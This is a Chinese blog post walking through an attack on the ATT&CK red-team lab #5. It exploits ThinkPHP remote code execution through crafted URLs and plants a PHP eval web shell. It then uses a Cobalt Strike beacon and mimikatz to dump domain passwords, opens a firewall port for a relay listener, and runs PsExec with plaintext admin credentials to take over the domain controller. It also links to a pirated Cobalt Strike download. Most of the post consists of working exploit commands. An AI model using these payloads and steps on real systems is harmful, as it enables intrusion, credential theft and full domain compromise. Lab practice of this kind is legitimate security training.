记一次内网渗透(ATT&CK第五个攻防靶场)

记一次内网渗透(ATT&CK第五个攻防靶场)

靶场下载地址:download

渗透测试

DT4ZJH.png
拿到题目打开是一个thinkphp框架
测试thinkphp版本
DT4L6I.png
找到此版本漏洞的poc 可以命令执行

http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

DT524g.png
查看当前路径

http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd

DTICVK.png

写一句话木马getshell

http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST['a']); ?^> > C:\phpStudy\PHPTutorial\WWW\public\shell.php

蚁剑连接
DTIWdK.png

当前权限是含有域环境的administrator权限
DT7AGF.png

内 网 渗 透

主机信息收集
arp -a

看一下 arp信息 发现 199段有一台ip200的机器
DT7bLR.png

ipconfig /all

看下ip,dns 为192.168.199.200 域名sun.com
DTH6fO.png

ping一下sun.com

DTHOXj.png
域控ip就是192.168.199.200

查看域用户

net user /domain

DTbU4f.png

内网横向移动

接下来攻击域控就用cs(cobalt strike)来完成

cobalt strike4.0中文版
网盘链接

https://pan.baidu.com/s/1iVzO47G-aGzFoa82Zdoobw

提取码:kxyz

因为win7这台靶机可以出网,win2008不可以
要让我们win7上线
首先搭建cs环境
使用kali作为服务端
本机win10作为客户端
1.将下载好的cs解压到两台机器

kali下:

进入cs文件下使用root权限

sudo su root
chmod 777 teamserver

修改teamserver文件权限
DTLxHA.png

vim teamserver

修改服务端端口
默认为(50050)
我这里修改为12345
DTOgUI.png

因为kali有防火墙
需要开放12345端口

sudo ufw allow 12345

DTjFmQ.png
现在启动服务端

./teamserver 192.168.199.207(kali的IP) 123456(cs服务密码后面连接需要用)

DTja6O.png
现在到本机打开客户端
DTjRc8.png
双击bat文件即可

DTvga9.png
打开就可以进行连接了
DTvf8x.png
成功连接!

创建监听器
D7pkid.png
生成windows exe木马
D7pwo4.png
D7pgOK.png
选择监听器
生成木马
利用蚁剑将木马程序上传到win7靶机
D79g9s.png
在终端运行木马程序
D7CBx1.png
cs中看到管理员已经上线
D7PWwT.png
运行mimikatz 读到了域管理员的密码
D7iLgs.png
提权
D7FHZ6.png
D7Fvzd.png
看到系统权限管理员已上线
扫一下内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口
(IPC共享:连接者可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表。)

(psexec:微软官方实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。)

portscan 192.168.199.0/24 445 arp 50
portscan  网段 端口 协议(icmp arp none)线程

D7ZPXj.png
扫到了许多存活主机
192.168.199.200是目标DC
由于这里的DC主机是不能出网的 但是cs服务端又是架设在互联网的

这时候就要用已经上线主机做listener 来让DC主机上线
在win7上设置中转监听

D7eVrd.png
D7eJqs.png
我这里使用1596端口来监听
查看一下端口状态

shell netstat -ano |findstr 1596

D7m61S.png
再次生成木马程序
D7noVA.png
将psexec和木马程序上传至win7靶机
psexec工具下载链接:

https://download.sysinternals.com/files/PSTools.zip

D7nY40.png

由于win7开着防火墙,dc在连接1596端口时进不来
先手动添加防火墙规则

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=1596

D7ufJ0.png

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.199.200 -u sun\Administrator -p 123456789a. -d -c C:\phpStudy\PHPTutorial\WWW\public\win2008.exe

执行payload看到DC已经上线
D7MNCt.png
运行mimikatz,得到win2008中admin的密码
D7lBkj.png
接下来可以操作DC系统文件
上传文件
D7Bz1U.png
运行mimikatz,得到win2008中admin的密码
D7lBkj.png
接下来可以操作DC系统文件
上传文件
D7Bz1U.png

  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值